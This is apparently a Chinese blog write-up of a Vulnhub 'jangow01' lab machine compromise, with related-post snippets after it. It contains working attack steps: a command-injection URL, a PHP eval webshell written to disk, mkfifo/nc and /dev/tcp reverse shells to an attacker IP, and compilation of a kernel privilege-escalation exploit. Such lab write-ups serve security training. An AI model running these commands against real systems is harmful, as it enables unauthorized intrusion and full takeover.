jangow01靶机渗透记录

最新推荐文章于 2025-04-29 16:04:21 发布
最新推荐文章于 2025-04-29 16:04:21 发布
阅读量432 收藏 8
点赞数 6
文章标签: php 网络安全 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/althumi/article/details/135034901
版权 
主机:192.168.10.106
靶机:192.168.10.107

nmap -p- 192.168.10.107

21/tcp open  ftp                                                                                                                                                                                                   
80/tcp open  http

nmap -sS -sV -A -n 192.168.10.107

21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18

dirsearch -u http://192.168.10.107/site/

dirsearch -u http://192.168.10.107

#访问备份文件,发现数据库连接源码,得到用户jangow01的密码
http://192.168.10.107/.backup

$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);

#访问提供的木马接口查看源码。
http://192.168.10.107/site/busque.php?buscar=cat busque.php

<?php system($_GET['buscar']); ?>

#上传一句话木马,方便蚁剑连接。
http://192.168.10.107/site/busque.php?buscar=echo '<?php @eval($_POST["a"]);' > hack.php

#蚁剑连接成功
http://192.168.10.107/site/hack.php
#因为靶机开启防火墙,只有443端口开放,使用nc获取shell
nc -lvvp 443
#依然禁止了-e参数
nc -e /bin/bash 192.168.10.106 443
#主机获取shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.106 433 >/tmp/f
#开启交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
#查看靶机信息
uname -a #Linux jangow01 4.4.0-31-generic
#得到靶机系统为ubuntu 16.04
lsb_release -a

Distributor ID: Ubuntu
Description:    Ubuntu 16.04.1 LTS
Release:        16.04
Codename:       xenial

#查询可用漏洞
searchsploit ubuntu 4.4.0-31

searchsploit ubuntu 16.04

#获取提权程序源码
searchsploit -m 45010.c

#上传蚁剑编译提权
gcc 45010.c -o exp

#提权成功,通关
cat proof.txt                                                                                                                                                                                                      
                       @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&                                                                                                                                         
                       @  @@@@@@@@@@@@@@@&#   #@@@@@@@@&(.    /&@@@@@@@@@@                                                                                                                                         
                       @  @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@&   .&@@@@@                                                                                                                                         
                       @  @@@@@@@&  @@@@@@&@@@@@&%######%&@*   ./@@*   &@@                                                                                                                                         
                       @  @@@@@* (@@@@@@@@@#/.               .*@.  .#&.   &@@@&&                                                                                                                                   
                       @  @@@, /@@@@@@@@#,                       .@.  ,&,   @@&&                                                                                                                                   
                       @  @&  @@@@@@@@#.         @@@,@@@/           %.  #,   %@&                                                                                                                                   
                       @@@#  @@@@@@@@/         .@@@@@@@@@@            *  .,    @@                                                                                                                                  
                       @@&  @@@@@@@@*          @@@@@@@@@@@             ,        @                                                                                                                                  
                       @&  .@@@@@@@(      @@@@@@@@@@@@@@@@@@@@@        *.       &@                                                                                                                                 
                      @@/  *@@@@@@@/           @@@@@@@@@@@#                      @@                                                                                                                                
                      @@   .@@@@@@@/          @@@@@@@@@@@@@              @#      @@                                                                                                                                
                      @@    @@@@@@@@.          @@@@@@@@@@@              @@(      @@                                                                                                                                
                       @&   .@@@@@@@@.         , @@@@@@@ *            .@@@*(    .@                                                                                                                                 
                       @@    ,@@@@@@@@,   @@@@@@@@@&*%@@@@@@@@@,    @@@@@(%&*   &@                                                                                                                                 
                       @@&     @@@@@@@@@@@@@@@@@         (@@@@@@@@@@@@@@%@@/   &@                                                                                                                                  
                       @ @&     ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%*   &@                                                                                                                                   
                       @  @@.     .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*    &@&                                                                                                                                   
                       @  @@@&       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/     &@@&&                                                                                                                                   
                       @  @@@@@@.        *%@@@@@@@@@@@@@@@@@@@@&#/.      &@@@@&&                                                                                                                                   
                       @  @@@@@@@@&               JANGOW               &@@@                                                                                                                                        
                       @  &&&&&&&&&@@@&     @@(&@ @. %.@ @@%@     &@@@&&&&                                                                                                                                         
                                     &&&@@@@&%       &/    (&&@@@&&&                                                                                                                                               
                                       (((((((((((((((((((((((((((((





da39a3ee5e6b4b0d3255bfef95601890afd80709
althumi
关注
jangow-01-1.0.1靶机渗透测试
weixin_58786230的博客
07-12 291
【代码】jangow-01-1.0.1靶机渗透测试。
Vulnhub靶场,超详细jangow-01-1.0.1靶机复现过程
cjchsh的博客
11-06 892
整理一下我们的上面过程的信息收集,从最开始的端口扫描,我们扫出来了21端口,80端口,再到目录扫描,我们扫到了一些目录,比如wordpress目录,js目录,assets目录,如下图这些目录,还有两套密码,一套是wordpress的,但是我们找不到后台,还有一套密码,不知道是干啥的,我们试一下21端口,用那套密码连接一下.所以,我们试试传点参数,看看页面有没有回显或者变化.我们传个id进去试试他把咱们传的id带进来了,说明这里没有对我们传入的参数进行限制,那我们就可以传入比如一句话木马了嘻嘻。
JANGOW-01靶机渗透记录
openstack_tutou的博客
02-17 303
进入到一个网页,查看发现点击到Buscar,会出现一个空白页面,url最后没有内容,很像命令执行的漏洞,测试一下。获取到IP地址后 nmap -sS -sV -p- -A 192.168.10.131 扫描靶机开放的端口。FTP连接后没有什么东西,这里我们反弹shell到kali,写一个代码到靶机当中。进行提权,去找一找有什么可以利用的提权方法,先去翻一翻有什么有用的文件。检索到版本漏洞信息,我们选择使用45010.c,下载提权漏洞到本地。测试命令执行漏洞存在,尝试写入一个一句话木马,访问这个php
记录下对vulhub靶机jangow的一次渗透测试
weixin_52020240的博客
03-11 5712
靶机地址 https://www.vulnhub.com/entry/jangow-101,754/ 难度:简单 靶机IP:192.168.21.150 kali IP:192.168.21.129 目标:两个flag 信息收集 扫描靶机开放的端口: nmap -A -p- 192.168.21.149 发现开放21和80端口 访问80端口主页面可以跳转的页面buscar 点击之后跳转 输入命令试一下发现可以执行命令 对网站进行目录扫描 dirb或者gobus
hackableII靶机渗透记录
althumi的博客
12-18 2090
【代码】hackableII靶机渗透记录
jangow01
wyzhxhn的博客
05-11 247
涉及知识:ftp连接,命令执行漏洞
VULNHUB中的jangow01-1.0.1
在Web和Reverse坑里游泳中。。。。
01-16 826
经过查询资料之后发现是kali的编译版本太高了,靶机使用的版本是2.23,kali的版本为2.38。收获满满的,一开始是想用‘bash -i >& /dev/tcp/ip/port 0>&1 ’连接nc,但是反弹不出来,所以才写的一句话,结果没想到绕来绕去的还是用了蚁剑。不断思考,下载的POC没有问题,一定是编译的问题,编译改了版本仍然报错,是不是上传的文件有问题?上来就踩坑,还是用的小套路,扫描存活IP,结果扫了个寂寞,求助了大佬才知道,原来是靶机的设定网卡和运行使用的网卡不是一个。并存在site目录。
vulnhub靶场JANGOW打靶记录
Bruce_lake的博客
04-20 185
然后再给kali添加个网络适配器,采用桥接模式,再让桥接模式网卡连接VirtualBox中仅主机模式网卡从而使得kali成功访问到靶机。目录扫描,发现了/.backup目录和site目录,先访问site目录进入站点,点了半天只有一个busque.php有点意思,有个空着的参数点,其他页面暂时找不到利用点。却发现弹不了,那就写个一句话用蚁剑连,再尝试上传个反弹shell的脚本。真是让人百思不得其解。上传提权辅助脚本,跑来看看靶机可能存在什么漏洞,再次发现之前其他靶机打过的cve-2021-4034提权漏洞。
渗透测试】 Vulnhub JANGOW 1.0.1
qq_51143406的博客
08-21 204
Vulnhub Jangow 做题记录
Vulnhub - JANGOW: 1.0.1
shuozhuqiu6452的博客
12-05 279
vulnhub - JANGOW: 1.0.1
【vulnhub--JANGOW: 1.0.1靶机练习】
qq_74240553的博客
01-24 957
将ova文件直接拖进vm中,如果有报错,重试一下就好,没有什么其他什么的修改网络模式为NAT,这样靶机和攻击机就可以是同一网段了设置好这些后,直接开机,开打查看攻击机ip攻击机ip为 192.168.47.156扫描网段结果知道靶机ip为??啊这么没有扫出来看了才知道,这里要用virtualbox,那就下载一个virtualbox下载地址:然后把网络模式调成桥接模式这样就可以还是在同一个网段了。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub——jangow-01-1.0.1靶机渗透 超详细
qq_48368964的博客
07-31 535
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。init用于指定内核挂载根文件系统后运行的第一个用户空间程序的绝对路径(也有文章描述为设置内核执行的初始化进程名)。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)重启进入系统,使用刚才修改的root密码进入root权限。
网络安全漏洞现状与风险管理分析
weixin_43172311的博客
04-27 753
在当今数字化时代,网络安全已成为企业和组织不可忽视的核心问题。网络环境的日益复杂和攻击手段的不断升级,使得漏洞管理成为网络安全战略中的关键环节。下面将详细分析当前网络安全领域的漏洞现状及有效的风险管理策略。
小结:BFD
weixin_44719499的博客
04-27 847
BFD(双向转发检测,Bidirectional Forwarding Detection)是一种快速、轻量级的故障检测机制,用于检测网络中两点之间的连通性。它广泛应用于各种场景。
Web技术与Nginx网站环境部署
2501_91344566的博客
04-28 865
网页是一个文件,它存放在世界某个角落的某一部计算机中,而这部计算机必须是与互联网相连的。网页经由网址(URL)来识别与存取,是互联网中的一"页"。内容作用文本文本是网页上最重要的信息载体与交流工具,网页中的主要信息一 般都以文本形式为主。图像图像元素在网页中具有提供信息并展示直观形象的作用。Flash动画动画在网页中的作用是有效地吸引访问者更多的注意。声音声音是多媒体和视频网页重要的组成部分。视频视频文件的采用使网页效果更加精彩且富有动感表格表格是在网页中用来控制页面信息的布局方式。导航栏。
NodeJs模块化与JavaScript的包管理工具
努力的nana
04-27 969
require。
如何在WordPress网站中设置双重验证,提升安全性
web_geek的博客
04-28 687
为了确保网站安全,你还需要从多个方面入手,结合使用安全插件、定期更新网站、选择优质服务器等手段,才能真正做到万无一失。通过这样的多层防护,即使面对复杂的网络攻击,你也能够更从容地保护自己的数据和用户信息。通过双重验证可以显著降低账户被盗的风险,即便黑客获取了你的密码,也需要额外验证才能登录。总之,无论你是新手站长还是经验丰富的开发者,都不要忽视安全问题,特别是在网络威胁日益增长的今天。双重验证在我们的日常生活中并不陌生,比如登录银行账户或支付平台时,常常会收到短信验证码,这就是最常见的一种双重验证方式。
nginx核心功能
最新发布
2401_84100398的博客
04-29 767
Nginx与Apahce一样,可以实现基于用户授权的访问控制,兰客户端想要访问相应网站或者目录时,要求用户输入用户名和密码才能正常访问,配置步骤与Apache基本一致。概括为以下几个步骤。生成用户密码认证文件。修改主配置文件相对应目录,添加认证配置项。重启服务,访问测试。基于客户端的访问控制是通过客户端IP地址,决定是否允许双页面访问。Nginx基于客户端的访问控制要比Apache简单,规则如下:deny IP/IP段:拒绝某个IP段的客户端访问。
DC9靶机渗透测试验收记录
01-10
### DC9靶机渗透测试验收标准与记录模板 对于DC9靶机渗透测试,验收标准通常围绕几个核心方面展开。这些方面包括但不限于漏洞发现的有效性、攻击路径验证以及安全建议的质量[^1]。 #### 漏洞发现有效性 有效的漏洞发现不仅限于识别已知的安全缺陷,还应涉及挖掘潜在未知风险的能力。这要求团队具备深入理解目标系统的架构和技术栈的知识,并能利用这一知识来探索可能存在的弱点[^2]。 #### 攻击路径验证 成功的渗透测试应当能够清晰展示从初始访问到最终控制的关键步骤。每一个假设性的入侵路线都需经过实际操作检验,确保其可行性并评估影响范围。此过程有助于客户直观了解自身网络环境下的真实威胁状况[^3]。 #### 安全建议质量 基于所发现问题提出的改进建议至关重要。高质量的安全措施不仅要针对性强,易于实施;更重要的是要考虑到业务连续性和成本效益等因素,在保障信息安全的同时不影响正常运营活动[^4]。 ```python # Python伪代码表示如何生成一份简单的报告结构 class ReportGenerator: def __init__(self, vulnerabilities_found, attack_paths_verified, security_advice_given): self.vulnerabilities_found = vulnerabilities_found self.attack_paths_verified = attack_paths_verified self.security_advice_given = security_advice_given def generate_report(self): report_content = { "Vulnerability Discovery": self.vulnerabilities_found, "Attack Path Verification": self.attack_paths_verified, "Security Advice Quality": self.security_advice_given } return report_content ``` 为了便于后续审查和改进工作,创建详细的文档化记录同样不可或缺。这类文件应该包含完整的测试计划描述、执行过程中遇到的具体情况说明及其解决方案概述等内容[^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值